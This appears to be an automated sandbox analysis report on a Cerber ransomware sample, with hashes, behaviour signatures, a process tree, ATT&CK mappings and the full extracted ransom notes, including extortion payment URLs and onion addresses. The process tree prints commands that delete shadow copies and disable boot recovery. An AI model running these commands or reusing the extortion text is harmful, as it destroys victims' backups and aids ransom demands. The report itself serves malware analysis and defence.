Analysis

  • max time kernel
    151s
  • max time network
    168s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    10-05-2024 21:48

General

  • Target

    31318ee80570c7168708575f032ac63f_JaffaCakes118.exe

  • Size

    257KB

  • MD5

    31318ee80570c7168708575f032ac63f

  • SHA1

    82a8589abd62b469c4ec3c454434a75a63f8b2c6

  • SHA256

    849b68c42ca9935f63aea47b02a730b64d0dcb9897e589fee3f64175bc592d84

  • SHA512

    bd0e851945ad1b2fd726976e5f03f4fad934f598cb8d936c59922afeb8e2cb575dc1a20a008bede70db26f4d6a91eb73d822539c59da7f5975e4244bc65440bc

  • SSDEEP

    6144:ewHysO+dCW3EWXJ44UMa6ZhZoXtMQJCIEFTcdGwJ:VO+EW3TXiNMlSXOQJpAcIwJ

Malware Config

Extracted

Path

C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\# DECRYPT MY FILES #.txt

Ransom Note
C_E_R_B_E_R R_A_N_S_O_M_W_A_R_E ######################################################################### Cannot you find the files you need? Is the content of the files that you looked for not readable??? It is normal because the files' names, as well as the data in your files have been encrypted. Great! You have turned to be a part of a big community "#Cerb3r Ransomware". ######################################################################### !!! If you are reading this message it means the software "Cerber" has !!! been removed from your computer. !!! HTML instruction ("# DECRYPT MY FILES #.html") always contains a !!! working domain of your personal page! ######################################################################### What is encryption? ------------------- Encryption is a reversible modification of information for security reasons but providing full access to it for authorized users. To become an authorized user and keep the modification absolutely reversible (in other words to have a possibility to decrypt your files) you should have an individual private key. But not only it. It is required also to have the special decryption software (in your case "Cerber Decryptor" software) for safe and complete decryption of all your files and data. ######################################################################### Everything is clear for me but what should I do? ------------------------------------------------ The first step is reading these instructions to the end. Your files have been encrypted with the "Cerber Ransomware" software; the instructions ("# DECRYPT MY FILES #.html" and "# DECRYPT MY FILES #.txt") in the folders with your encrypted files are not viruses, they will help you. After reading this text the most part of people start searching in the Internet the words the "Cerber Ransomware" where they find a lot of ideas, recommendations and instructions. It is necessary to realize that we are the ones who closed the lock on your files and we are the only ones who have this secret key to open them. !!! Any attempts to return your files with the third-party tools can !!! be fatal for your encrypted files. The most part of the third-party software change data within the encrypted file to restore it but this causes damage to the files. Finally it will be impossible to decrypt your files. When you make a puzzle, but some items are lost, broken or not put in its place - the puzzle items will never match, the same way the third-party software will ruin your files completely and irreversibly. You should realize that any intervention of the third-party software to restore files encrypted with the "Cerber Ransomware" software may be fatal for your files. ######################################################################### !!! There are several plain steps to restore your files but if you do !!! not follow them we will not be able to help you, and we will not try !!! since you have read this warning already. ######################################################################### For your information the software to decrypt your files (as well as the private key provided together) are paid products. After purchase of the software package you will be able to: 1. decrypt all your files; 2. work with your documents; 3. view your photos and other media; 4. continue your usual and comfortable work at the computer. If you understand all importance of the situation then we propose to you to go directly to your personal page where you will receive the complete instructions and guarantees to restore your files. ######################################################################### There is a list of temporary addresses to go on your personal page below: _______________________________________________________________________ | | 1. http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374 | | 2. http://52uo5k3t73ypjije.8kcfnk.bid/AD10-4B65-57FA-005C-9374 | | 3. http://52uo5k3t73ypjije.csv7o6.bid/AD10-4B65-57FA-005C-9374 | | 4. http://52uo5k3t73ypjije.jal9lk.bid/AD10-4B65-57FA-005C-9374 | | 5. http://52uo5k3t73ypjije.onion.to/AD10-4B65-57FA-005C-9374 |_______________________________________________________________________ ######################################################################### What should you do with these addresses? ---------------------------------------- If you read the instructions in TXT format (if you have instruction in HTML (the file with an icon of your Internet browser) then the easiest way is to run it): 1. take a look at the first address (in this case it is http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374); 2. select it with the mouse cursor holding the left mouse button and moving the cursor to the right; 3. release the left mouse button and press the right one; 4. select "Copy" in the appeared menu; 5. run your Internet browser (if you do not know what it is run the Internet Explorer); 6. move the mouse cursor to the address bar of the browser (this is the place where the site address is written); 7. click the right mouse button in the field where the site address is written; 8. select the button "Insert" in the appeared menu; 9. then you will see the address http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374 appeared there; 10. press ENTER; 11. the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address if falling. If for some reason the site cannot be opened check the connection to the Internet; if the site still cannot be opened take a look at the instructions on omitting the point about working with the addresses in the HTML instructions. If you browse the instructions in HTML format: 1. click the left mouse button on the first address (in this case it is http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374); 2. in a new tab or window of your web browser the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address. If for some reason the site cannot be opened check the connection to the Internet. ######################################################################### Unfortunately these sites are short-term since the antivirus companies are interested in you do not have a chance to restore your files but continue to buy their products. Unlike them we are ready to help you always. If you need our help but the temporary sites are not available: 1. run your Internet browser (if you do not know what it is run the Internet Explorer); 2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER; 3. wait for the site loading; 4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed; 5. run Tor Browser; 6. connect with the button "Connect" (if you use the English version); 7. a normal Internet browser window will be opened after the initialization; 8. type or copy the address ________________________________________________________ | | | http://52uo5k3t73ypjije.onion/AD10-4B65-57FA-005C-9374 | |________________________________________________________| in this browser address bar; 9. press ENTER; 10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again. If you have any problems during installation or operation of Tor Browser, please, visit https://www.youtube.com/ and type request in the search bar "install tor browser windows" and you will find a lot of training videos about Tor Browser installation and operation. If TOR address is not available for a long period (2-3 days) it means you are late; usually you have about 2-3 weeks after reading the instructions to restore your files. ######################################################################### Additional information: You will find the instructions for restoring your files in those folders where you have your encrypted files only. The instructions are made in two file formats - HTML and TXT for your convenience. Unfortunately antivirus companies cannot protect or restore your files but they can make the situation worse removing the instructions how to restore your encrypted files. The instructions are not viruses; they have informative nature only, so any claims on the absence of any instruction files you can send to your antivirus company. ######################################################################### Cerber Ransomware Project is not malicious and is not intended to harm a person and his/her information data. The project is created for the sole purpose of instruction regarding information security, as well as certification of antivirus software for their suitability for data protection. Together we make the Internet a better and safer place. ######################################################################### If you look through this text in the Internet and realize that something is wrong with your files but you do not have any instructions to restore your files, please, contact your antivirus support. ######################################################################### Remember that the worst situation already happened and now it depends on your determination and speed of your actions the further life of your files.
URLs

http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374

http://52uo5k3t73ypjije.8kcfnk.bid/AD10-4B65-57FA-005C-9374

http://52uo5k3t73ypjije.csv7o6.bid/AD10-4B65-57FA-005C-9374

http://52uo5k3t73ypjije.jal9lk.bid/AD10-4B65-57FA-005C-9374

http://52uo5k3t73ypjije.onion.to/AD10-4B65-57FA-005C-9374

http://52uo5k3t73ypjije.onion/AD10-4B65-57FA-005C-9374

Extracted

Path

C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\# DECRYPT MY FILES #.html

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>&#067;erber &#082;ansomware</title> <style> a { color: #47c; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #333; font-family: "Helvetica Neue", Helvetica, "Segoe UI", Arial, freesans, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; line-height: 1.6; margin: 0; padding: 0; } hr { background-color: #e7e7e7; border: 0 none; border-bottom: 1px solid #c7c7c7; height: 5px; margin: 30px 0; } li { padding: 0 0 7px 7px; } ol { padding-left: 3em; } .container { background-color: #fff; border: 1px solid #c7c7c7; margin: 40px; padding: 40px 40px 20px 40px; } .info, .tor { background-color: #efe; border: 1px solid #bda; display: block; padding: 0px 20px; } .logo { font-size: 12px; font-weight: bold; line-height: 1; margin: 0; } .upd_on { color: red; display: block; } .upd_off { display: none; float: left; } .tor { padding: 10px 0; text-align: center; } .url { margin-right: 5px; } .warning { background-color: #f5e7e7; border: 1px solid #ebccd1; color: #a44; display: block; padding: 15px 10px; text-align: center; } </style> </head> <body> <div class="container"> <h3>C E R B E R&nbsp;&nbsp;&nbsp;R A N S O M W A R E</h3> <hr> <p>Cannot you find the files you need?<br>Is the content of the files that you looked for not readable?</p> <p>It is normal because the files' names, as well as the data in your files have been encrypted.</p> <p>Great!<br>You have turned to be a part of a big community "#C3rber Ransomware".</p> <hr> <p><span class="warning">If you are reading this message it means the software "Cerber" has been removed from your computer.</span></p> <hr> <h3>What is encryption?</h3> <p>Encryption is a reversible modification of information for security reasons but providing full access to it for authorized users.</p> <p>To become an authorized user and keep the modification absolutely reversible (in other words to have a possibility to decrypt your files) you should have an individual private key.</p> <p>But not only it.</p> <p>It is required also to have the special decryption software (in your case "Cerber Decryptor" software) for safe and complete decryption of all your files and data.</p> <hr> <h3>Everything is clear for me but what should I do?</h3> <p>The first step is reading these instructions to the end.</p> <p>Your files have been encrypted with the "Cerber Ransomware" software; the instructions ("# DECRYPT MY FILES #.html" and "# DECRYPT MY FILES #.txt") in the folders with your encrypted files are not viruses, they will help you.</p> <p>After reading this text the most part of people start searching in the Internet the words the "Cerber Ransomware" where they find a lot of ideas, recommendations and instructions.</p> <p>It is necessary to realize that we are the ones who closed the lock on your files and we are the only ones who have this secret key to open them.</p> <p><span class="warning">!Any attempts to get back your files with the third-party tools can be fatal for your encrypted files!</span></p> <p>The most part of the third-party software change data within the encrypted file to restore it but this causes damage to the files.</p> <p>Finally it will be impossible to decrypt your files!</p> <p>When you make a puzzle, but some items are lost, broken or not put in its place - the puzzle items will never match, the same way the third-party software will ruin your files completely and irreversibly.</p> <p>You should realize that any intervention of the third-party software to restore files encrypted with the "Cerber Ransomware" software may be fatal for your files.</p> <hr> <p><span class="warning">There are several plain steps to restore your files but if you do not follow them we will not be able to help you, and we will not try since you have read this warning already.</span></p> <hr> <p>For your information the software to decrypt your files (as well as the private key provided together) are paid products.</p> <p>After purchase of the software package you will be able to:</p> <ol> <li>decrypt all your files;</li> <li>work with your documents;</li> <li>view your photos and other media;</li> <li>continue your usual and comfortable work at the computer.</li> </ol> <p>If you understand all importance of the situation then we propose to you to go directly to your personal page where you will receive the complete instructions and guarantees to restore your files.</p> <hr> <div class="info"> <p>There is a list of temporary addresses to go on your personal page below:</p> <ol> <li><span class="upd_off" id="upd_1">Please wait...</span><a class="url" href="http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374" id="url_1" target="_blank">http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374</a>(<a href="#updateUrl" onClick="return updateUrl();" style="color: red;">Get a NEW address!</a>)</li> <li><a href="http://52uo5k3t73ypjije.8kcfnk.bid/AD10-4B65-57FA-005C-9374" target="_blank">http://52uo5k3t73ypjije.8kcfnk.bid/AD10-4B65-57FA-005C-9374</a></li> <li><a href="http://52uo5k3t73ypjije.csv7o6.bid/AD10-4B65-57FA-005C-9374" target="_blank">http://52uo5k3t73ypjije.csv7o6.bid/AD10-4B65-57FA-005C-9374</a></li> <li><a href="http://52uo5k3t73ypjije.jal9lk.bid/AD10-4B65-57FA-005C-9374" target="_blank">http://52uo5k3t73ypjije.jal9lk.bid/AD10-4B65-57FA-005C-9374</a></li> <li><a href="http://52uo5k3t73ypjije.onion.to/AD10-4B65-57FA-005C-9374" target="_blank">http://52uo5k3t73ypjije.onion.to/AD10-4B65-57FA-005C-9374</a></li> </ol> </div> <hr> <h3>What should you do with these addresses?</h3> <p>If you read the instructions in TXT format (if you have instruction in HTML (the file with an icon of your Internet browser) then the easiest way is to run it):</p> <ol> <li>take a look at the first address (in this case it is <span class="upd_off" id="upd_2">Please wait...</span><a class="url" href="http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374" id="url_2" target="_blank">http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374</a>);</li> <li>select it with the mouse cursor holding the left mouse button and moving the cursor to the right;</li> <li>release the left mouse button and press the right one;</li> <li>select "Copy" in the appeared menu;</li> <li>run your Internet browser (if you do not know what it is run the Internet Explorer);</li> <li>move the mouse cursor to the address bar of the browser (this is the place where the site address is written);</li> <li>click the right mouse button in the field where the site address is written;</li> <li>select the button "Insert" in the appeared menu;</li> <li>then you will see the address <span class="upd_off" id="upd_3">Please wait...</span><a class="url" href="http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374" id="url_3" target="_blank">http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374</a> appeared there;</li> <li>press ENTER;</li> <li>the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address if falling.</li> </ol> <p>If for some reason the site cannot be opened check the connection to the Internet; if the site still cannot be opened take a look at the instructions on omitting the point about working with the addresses in the HTML instructions.</p> <p>If you browse the instructions in HTML format:</p> <ol> <li>click the left mouse button on the first address (in this case it is <span class="upd_off" id="upd_4">Please wait...</span><a class="url" href="http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374" id="url_4" target="_blank">http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374</a>);</li> <li>in a new tab or window of your web browser the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address.</li> </ol> <p>If for some reason the site cannot be opened check the connection to the Internet.</p> <hr> <p>Unfortunately these sites are short-term since the antivirus companies are interested in you do not have a chance to restore your files but continue to buy their products.</p> <p>Unlike them we are ready to help you always.</p> <p>If you need our help but the temporary sites are not available:</p> <ol> <li>run your Internet browser (if you do not know what it is run the Internet Explorer);</li> <li>enter or copy the address <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> into the address bar of your browser and press ENTER;</li> <li>wait for the site loading;</li> <li>on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;</li> <li>run Tor Browser;</li> <li>connect with the button "Connect" (if you use the English version);</li> <li>a normal Internet browser window will be opened after the initialization;</li> <li>type or copy the address <span class="tor">http://52uo5k3t73ypjije.onion/AD10-4B65-57FA-005C-9374</span> in this browser address bar;</li> <li>press ENTER;</li> <li>the site should be loaded; if for some reason the site is not loading wait for a moment and try again.</li> </ol> <p>If you have any problems during installation or operation of Tor Browser, please, visit <a href="https://www.youtube.com/results?search_query=install+tor+browser+windows" target="_blank">https://www.youtube.com/</a> and type request in the search bar "install tor browser windows" and you will find a lot of training videos about Tor Browser installation and operation.</p> <p>If TOR address is not available for a long period (2-3 days) it means you are late; usually you have about 2-3 weeks after reading the instructions to restore your files.</p> <hr> <h3>Additional information:</h3> <p>You will find the instructions for restoring your files in those folders where you have your encrypted files only.</p> <p>The instructions are made in two file formats - HTML and TXT for your convenience.</p> <p>Unfortunately antivirus companies cannot protect or restore your files but they can make the situation worse removing the instructions how to restore your encrypted files.</p> <p>The instructions are not viruses; they have informative nature only, so any claims on the absence of any instruction files you can send to your antivirus company.</p> <hr> <p>Cerber Ransomware Project is not malicious and is not intended to harm a person and his/her information data.</p> <p>The project is created for the sole purpose of instruction regarding information security, as well as certification of antivirus software for their suitability for data protection.</p> <p>Together we make the Internet a better and safer place.</p> <hr> <p>If you look through this text in the Internet and realize that something is wrong with your files but you do not have any instructions to restore your files, please, contact your antivirus support.</p> <hr> <p>Remember that the worst situation already happened and now it depends on your determination and speed of your actions the further life of your files.</p> </div> <script> function getXMLHttpRequest() { if (window.XMLHttpRequest) { return new window.XMLHttpRequest; } else { try { return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch(error) { return null; } } } function getUrlContent(url, callback) { var xhttp = getXMLHttpRequest(); if (xhttp) { xhttp.onreadystatechange = function() { if (xhttp.readyState == 4) { if (xhttp.status == 200) { return callback(xhttp.responseText.replace(/[\s ]+/gm, ""), null); } else { return callback(null, true); } } }; xhttp.open("GET", url + '?_=' + new Date().getTime(), true); xhttp.send(); } else { return callback(null, true); } } function server1(address, callback) { getUrlContent("http://btc.blockr.io/api/v1/address/txs/" + address, function(result, error) { if (!error) { var tx = /"tx":"([\w]+)","time_utc":"[\w-:]+","confirmations":[\d]+,"amount":-/.exec(result); if (tx) { getUrlContent("http://btc.blockr.io/api/v1/tx/info/" + tx[1], function(result, error) { if (!error) { var address = /"vouts":\[{"address":"([\w]+)"/.exec(result); if (address) { return callback(address[1], null); } else { return callback(null, true); } } else { return callback(null, true); } }); } else { return callback(null, true); } } else { return callback(null, true); } }); } function server2(address, callback) { getUrlContent("http://api.blockcypher.com/v1/btc/main/addrs/" + address, function(result, error) { if (!error) { var tx = /"tx_hash":"([\w]+)","block_height":[\d]+,"tx_input_n":[\d-]+,"tx_output_n":-/.exec(result); if (tx) { getUrlContent("http://api.blockcypher.com/v1/btc/main/txs/" + tx[1], function(result, error) { if (!error) { var address = /"outputs":\[{"value":[\d]+,"script":"[\w]+","spent_by":"[\w]+","addresses":\["([\w]+)"/.exec(result); if (address) { return callback(address[1], null); } else { return callback(null, true); } } else { return callback(null, true); } }); } else { return callback(null, true); } } else { return callback(null, true);

Signatures

  • Cerber 2 IoCs

    Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Contacts a large (514) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 15 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 2 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 2 IoCs
  • Modifies Control Panel 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\31318ee80570c7168708575f032ac63f_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\31318ee80570c7168708575f032ac63f_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2056
    • C:\Users\Admin\AppData\Local\Temp\31318ee80570c7168708575f032ac63f_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\31318ee80570c7168708575f032ac63f_JaffaCakes118.exe"
      2⤵
      • Cerber
      • Modifies visiblity of hidden/system files in Explorer
      • Adds policy Run key to start application
      • Drops startup file
      • Loads dropped DLL
      • Adds Run key to start application
      • Modifies Control Panel
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2656
      • C:\Users\Admin\AppData\Roaming\{13610826-3503-134D-4C2C-C16FE04D06AA}\makecab.exe
        "C:\Users\Admin\AppData\Roaming\{13610826-3503-134D-4C2C-C16FE04D06AA}\makecab.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2348
        • C:\Users\Admin\AppData\Roaming\{13610826-3503-134D-4C2C-C16FE04D06AA}\makecab.exe
          "C:\Users\Admin\AppData\Roaming\{13610826-3503-134D-4C2C-C16FE04D06AA}\makecab.exe"
          4⤵
          • Cerber
          • Modifies visiblity of hidden/system files in Explorer
          • Adds policy Run key to start application
          • Executes dropped EXE
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • Sets desktop wallpaper using registry
          • Drops file in Program Files directory
          • Modifies Control Panel
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1200
          • C:\Windows\system32\vssadmin.exe
            "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:2740
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2332
          • C:\Windows\System32\bcdedit.exe
            "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2136
          • C:\Windows\System32\bcdedit.exe
            "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2824
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\# DECRYPT MY FILES #.html
            5⤵
              PID:2212
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2212 CREDAT:275457 /prefetch:2
                6⤵
                  PID:2268
              • C:\Windows\system32\NOTEPAD.EXE
                "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\# DECRYPT MY FILES #.txt
                5⤵
                  PID:2688
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\# DECRYPT MY FILES #.vbs"
                  5⤵
                    PID:1560
                  • C:\Windows\system32\cmd.exe
                    /d /c taskkill /f /im "makecab.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\AppData\Roaming\{13610826-3503-134D-4C2C-C16FE04D06AA}\makecab.exe" > NUL
                    5⤵
                      PID:320
                      • C:\Windows\system32\taskkill.exe
                        taskkill /f /im "makecab.exe"
                        6⤵
                        • Kills process with taskkill
                        PID:1344
                      • C:\Windows\system32\PING.EXE
                        ping -n 1 127.0.0.1
                        6⤵
                        • Runs ping.exe
                        PID:920
                • C:\Windows\SysWOW64\cmd.exe
                  /d /c taskkill /f /im "31318ee80570c7168708575f032ac63f_JaffaCakes118.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\AppData\Local\Temp\31318ee80570c7168708575f032ac63f_JaffaCakes118.exe" > NUL
                  3⤵
                  • Deletes itself
                  • Suspicious use of WriteProcessMemory
                  PID:2224
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im "31318ee80570c7168708575f032ac63f_JaffaCakes118.exe"
                    4⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1068
                  • C:\Windows\SysWOW64\PING.EXE
                    ping -n 1 127.0.0.1
                    4⤵
                    • Runs ping.exe
                    PID:1912
            • C:\Windows\system32\vssvc.exe
              C:\Windows\system32\vssvc.exe
              1⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:772
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
              1⤵
                PID:2976
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2976 CREDAT:275457 /prefetch:2
                  2⤵
                    PID:216
                • C:\Windows\SysWOW64\DllHost.exe
                  C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
                  1⤵
                    PID:2408
                  • C:\Windows\system32\AUDIODG.EXE
                    C:\Windows\system32\AUDIODG.EXE 0x52c
                    1⤵
                      PID:1952

                    Network

                    MITRE ATT&CK Matrix ATT&CK v13

                    Execution

                    Windows Management Instrumentation

                    1
                    T1047

                    Persistence

                    Boot or Logon Autostart Execution

                    2
                    T1547

                    Registry Run Keys / Startup Folder

                    2
                    T1547.001

                    Privilege Escalation

                    Boot or Logon Autostart Execution

                    2
                    T1547

                    Registry Run Keys / Startup Folder

                    2
                    T1547.001

                    Defense Evasion

                    Hide Artifacts

                    1
                    T1564

                    Hidden Files and Directories

                    1
                    T1564.001

                    Modify Registry

                    4
                    T1112

                    Indicator Removal

                    2
                    T1070

                    File Deletion

                    2
                    T1070.004

                    Credential Access

                    Unsecured Credentials

                    1
                    T1552

                    Credentials In Files

                    1
                    T1552.001

                    Discovery

                    Network Service Discovery

                    1
                    T1046

                    System Information Discovery

                    2
                    T1082

                    Remote System Discovery

                    1
                    T1018

                    Collection

                    Data from Local System

                    1
                    T1005

                    Impact

                    Inhibit System Recovery

                    3
                    T1490

                    Defacement

                    1
                    T1491

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\# DECRYPT MY FILES #.html
                      Filesize

                      19KB

                      MD5

                      d021536a9c4516dd3fcd9dcdb55624cb

                      SHA1

                      c637648303e056137401d4992d59d85eace95be7

                      SHA256

                      b6801baeedd7fe5ab3c8bcb893a8db33e38e12c57b49a8ab94fb9f1c595568f4

                      SHA512

                      b48e77f10e7a1f62b9f339e10e3b3186e4dd7edfe47073972e34e8ef7b5f1168b528aca0f3b41b2c9ca828e7884c2808664caacb973eafc68d858877ea863649

                    • C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\# DECRYPT MY FILES #.txt
                      Filesize

                      10KB

                      MD5

                      24228ad53b1ec8034ab9fbaef430c662

                      SHA1

                      7b25a0970562cbf1169fa1035c36ee6d7937df95

                      SHA256

                      794aadafa042dc4a8d3a470b49b401e20ccb9897112ede79d93ec377af888ff2

                      SHA512

                      e783205e43ff9fa0f34d476ef36f31677624d0e98c4985c58bf2c9b13c31f29ab9d9fa4beeec6ab8091c8775c621e851f60f5ab0207e8407828c8b80cb162844

                    • C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\# DECRYPT MY FILES #.url
                      Filesize

                      90B

                      MD5

                      4a749ade553f474bca53380d3da673d3

                      SHA1

                      ce5725a8f2b327812eff2e52f02ce542a63c8d1b

                      SHA256

                      06d0b474228a38e81da249a6689bc80874d3a9b3db135131ef0dba27333b2f18

                      SHA512

                      13d78c04bca866b2787bd5b3bc2bc8e184ae790aaa101b300e49a05cb534032e5115648a6fcbc77e7f8ab63af6d5d85257ef5b4af3eba80bc4e8718b05f5c9be

                    • C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\# DECRYPT MY FILES #.vbs
                      Filesize

                      252B

                      MD5

                      18d46f5d8ebd3c7d6df0c7a8fd1bd64d

                      SHA1

                      aeb8407457434aabce2a4c2f95fe305c5303f929

                      SHA256

                      ceb35b75d397b07c84dfab3a28189e9431bdf80ec99ab65f9ccf01986bd4a8e9

                      SHA512

                      35fc759be0dee77eb9e39350873c24d9693cf6f370f171814e2ce6250ea814fea8a0887442ebae9077d6e9ff81ae7034faa0afcb080401a7d4ac384d2ba42d65

                    • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{6F744CE1-0F17-11EF-9960-CAFA5A0A62FD}.dat
                      Filesize

                      5KB

                      MD5

                      2f22d5e23914bf5417ebe8521c16be58

                      SHA1

                      98c53dc942b30c268c172955adf7743dd11edaf5

                      SHA256

                      3b9939f53cbc865ba20909e7118824253b8a361cbf200ab610657880faa68f22

                      SHA512

                      a05e2b2159198696b58f70154ac8267672b0d5dbc64078e783f58f1f39fd1be106eed71966a86ea34aed8ae828f578898f9063382e227be2c47218ac7db03fcf

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\json[1].json
                      Filesize

                      297B

                      MD5

                      bd0c2d8e6b0fe0de4a3869c02ee43a85

                      SHA1

                      21d8cca90ea489f88c2953156e6c3dec6945388b

                      SHA256

                      3a3e433f615f99529721ee766ad453b75d73fe213cb1ab74ccbb4c0e32dcd533

                      SHA512

                      496b1285f1e78d50dd79b05fa2cbf4a0b655bb3e4515646be3a7c7cdf85d7db6ab35577aa1e294f3d515d707ca341652b5ae9d4b22197e4480226ef8440294b6

                    • C:\Users\Admin\AppData\Roaming\403-3.htm
                      Filesize

                      1KB

                      MD5

                      c7df00e9e0609d4216bb7404dd9c12ee

                      SHA1

                      3aac5a61dc12fcf9fd23280d8fc6361ef734c524

                      SHA256

                      9fa88627e300794f3f5f657aed1a58a447d4cd5ce6989d49d62dca9507c3d9de

                      SHA512

                      87427aca49cf20aa8d36541f589940b23e42d60eda72965f75ebdbb8342a19198c8625b8d4f9c71b4444d14ca99816d314991ff1e870da3437cbc15453d8e47f

                    • C:\Users\Admin\AppData\Roaming\ChiPollywog.9mW
                      Filesize

                      79KB

                      MD5

                      68e275edb605a67c22851ddb5a4576fd

                      SHA1

                      9f6b1548c529230895ff7bf1da4acaf5f0a3d259

                      SHA256

                      4da115c31baae5f1310afa48ab710b9cd443f4ce2bd859d722cfdcf253578a99

                      SHA512

                      c64e22115b69df57cdd4e299c555fe7c141d7cecf3c0d8f03d6ccb0bf9df27c3d39a082ee4b57484e50e95823241379dca5073bae45c7e9159f8342740322f06

